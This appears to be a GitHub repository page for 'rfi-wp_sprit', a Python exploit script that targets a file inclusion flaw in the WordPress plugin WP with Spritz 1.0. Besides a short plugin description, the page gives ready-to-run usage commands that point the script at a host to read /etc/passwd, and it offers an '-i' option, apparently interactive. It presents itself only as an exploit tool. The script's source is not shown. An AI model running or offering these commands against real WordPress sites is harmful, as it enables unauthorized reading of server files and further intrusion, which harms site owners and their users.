mekhalleh / rfi-wp_sprit

This script exploit the LFI in Wordpress plugin WP with Spritz 1.0

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion

WP with Spritz is a plugin that allows readers of your blog to read more of your content quicker using Spritz "patented speed reading technology".

./wp_spritz.py --url http://192.168.1.22/ /etc/passwd
./wp_spritz.py --url http://192.168.1.22/ --path /wordpress/ /etc/passwd

./wp_spritz.py --url http://192.168.1.22/ -i
./wp_spritz.py --url http://192.168.1.22/ --path /wordpress/ -i

About

This script exploit the LFI in Wordpress plugin WP with Spritz 1.0


Languages

Language:Python 100.0%